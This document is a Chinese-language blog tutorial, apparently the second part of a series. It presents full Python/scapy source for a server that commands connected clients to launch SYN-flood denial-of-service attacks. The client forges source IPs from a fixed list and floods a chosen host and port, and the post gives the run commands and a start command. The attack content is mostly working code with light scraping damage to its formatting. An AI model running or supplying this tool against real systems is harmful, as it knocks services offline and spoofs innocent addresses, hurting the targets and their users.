python模拟ddos攻击_用Python-scapy实现SYNDdos攻击(2)

四在第一篇学习了基础知识,本篇实现Server和Client的编码实现

Server端

由于Server端能等待Client主动连接,所以在Server端发送命令,控制Client端发起SYN泛洪攻击。

实现主函数的完整逻辑,在主函数中创建socket, 绑定所有网络地址和58868端口并开始监听,之后新开一个线程来等待客户端的连接,以免阻塞输入命令。

def main():

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.bind(('0.0.0.0', 58868))

s.listen(1024)

t = Thread(target=waitConnect,args=(s,))

t.start()

print('Wait at least a client connection!')

while not len(socketList): #主函数中我们第一次输入命令之前需要至少有一个客户端连接到服务器

pass

print('It has been a client connection!')

while True: print('=' * 50)

print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c "')

#等待输入命令

cmd_str = input('Please input cmd:')

if len(cmd_str):

if cmd_str[0] == '#':

sendCmd(cmd_str) ##如果满足了,我们就把命令发送给所有客户端。

编写主函数中没有完成的子功能。 首先我们应该实现等待客户端的函数,方便开启新的线程。

#等待连接

def waitConnect(s):

while True:

sock,addr = s.accept()

if sock not in socketList: #新连接的socket要判断一下是否在socketList中已经存储过了,如果没有的话就添加到socketList中

socketList.append(sock)

#发送命令

def sendCmd(cmd):

print('Send command......')

for sock in socketList:

sock.send(cmd.encode('utf-8'))

Client端

在Client端实现对主机的SYN泛洪攻击,并在脚本启动后主动连接Server端,等待Server端发送命令。

在主函数中先创建ArgumentParser()对象,并将需要解析的命令参数添加好。

def main():

p = argparse.ArgumentParser()

p.add_argument('-H', dest='host', type=str)

p.add_argument('-p', dest='port', type=int)

p.add_argument('-c', dest='cmd', type=str)```

```

#测试我们连接到本地地址的58868端口吧!之后我们就可以等待服务器发送命令了。

try:

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('127.0.0.1',58868)) print('To connected server was success!')

print("=" * 40)

cmdHandle(s,p)

```

except:

print('The network connected failed!')

print('Please restart the script!')

sys.exit(0)

将接收命令和处理命令定义在了一个单独的函数中。在这里用到了一个全局变量,用于判断是否有进程正在发起SYN泛洪攻击。之后就开始循环接收命令了,接收之后到的数据是byte型,需要对其进行解码,解码之后才是字符串。如果接收到的数据长度为0,就跳过后续的内容,重新接收数据。

处理命令

def cmdHandle(sock,parser):

global curProcess

while True:

#接收命令

data = sock.recv(1024).decode('utf-8')

if len(data) == 0:

print('The data is empty')

continue

如果数据的长度不为0,就判断是否具有命令基本格式的特征(#),满足基本条件就需要用我们的ArgumentParser对象来解析命令了

if data[0] == '#':

try: #解析命令

options = parser.parse_args(data[1:].split())

m_host = options.host m_port = options.port

m_cmd = options.cmd

命令参数解析出来后,我么就要判断到底是start命令还是stop命令了,如果是start命令,我们首先判断当前是否有进程在运行,如果有进程判断进程是否存活。如果当前有进程正在发起SYN泛洪攻击,我们就先结束这个进程,并清空屏幕。然后我们就直接启动一个进程,发起SYN泛洪攻击

DDoS启动命令

if m_cmd.lower() == 'start':

if curProcess != None and curProcess.is_alive():

#结束进程

curProcess.terminate() curProcess = None

os.system('clear')

print('The synFlood is start')

p = Process(target=synFlood,args=(m_host,m_port))

p.start() curProcess = p

DDoS停止命令

elif m_cmd.lower() =='stop':

if curProcess.is_alive():

curProcess.terminate()

os.system('clear')

except:

print('Failed to perform the command!')

###五、测试

- 运行Server脚本

``` sudo python3 ddosSrv.py ```

- 运行Client脚本

```sudo python3 ddosCli.py ```

- 输入一个命令测试一下

```#-H x.x.x.x -p 80 -c start ```

#####Client端源代码:

!/usr/bin/python3

-- coding: utf-8 --

import sys

import socket

import random

import argparse

from multiprocessing import Process

from scapy.all import *

import os

isWorking = False

curProcess = None

SYN泛洪攻击

def synFlood(tgt,dPort):

print('='100)

print('The syn flood is running!')

print('='100)

srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']

for sPort in range(1024,65535):

index = random.randrange(4)

ipLayer = IP(src=srcList[index], dst=tgt)

tcpLayer = TCP(sport=sPort, dport=dPort,flags="S")

packet = ipLayer / tcpLayer

send(packet)

命令格式'#-H xxx.xxx.xxx.xxx -p xxxx -c '

处理命令

def cmdHandle(sock,parser):

global curProcess

while True:

#接收命令

data = sock.recv(1024).decode('utf-8')

if len(data) == 0:

print('The data is empty')

return

if data[0] == '#':

try:

#解析命令

options = parser.parse_args(data[1:].split())

m_host = options.host

m_port = options.port

m_cmd = options.cmd

#DDoS启动命令

if m_cmd.lower() == 'start':

if curProcess != None and curProcess.is_alive():

curProcess.terminate()

curProcess = None

os.system('clear')

print('The synFlood is start')

p = Process(target=synFlood,args=(m_host,m_port))

p.start()

curProcess = p

#DDoS停止命令

elif m_cmd.lower() =='stop':

if curProcess.is_alive():

curProcess.terminate()

os.system('clear')

except:

print('Failed to perform the command!')

def main():

#添加需要解析的命令

p = argparse.ArgumentParser()

p.add_argument('-H', dest='host', type=str)

p.add_argument('-p', dest='port', type=int)

p.add_argument('-c', dest='cmd', type=str)

print("*" * 40)

try:

#创建socket对象

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

#连接到服务器端

s.connect(('127.0.0.1',58868))

print('To connected server was success!')

print("=" * 40)

#处理命令

cmdHandle(s,p)

except:

print('The network connected failed!')

print('Please restart the script!')

sys.exit(0)

if name == 'main':

main()

结束

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值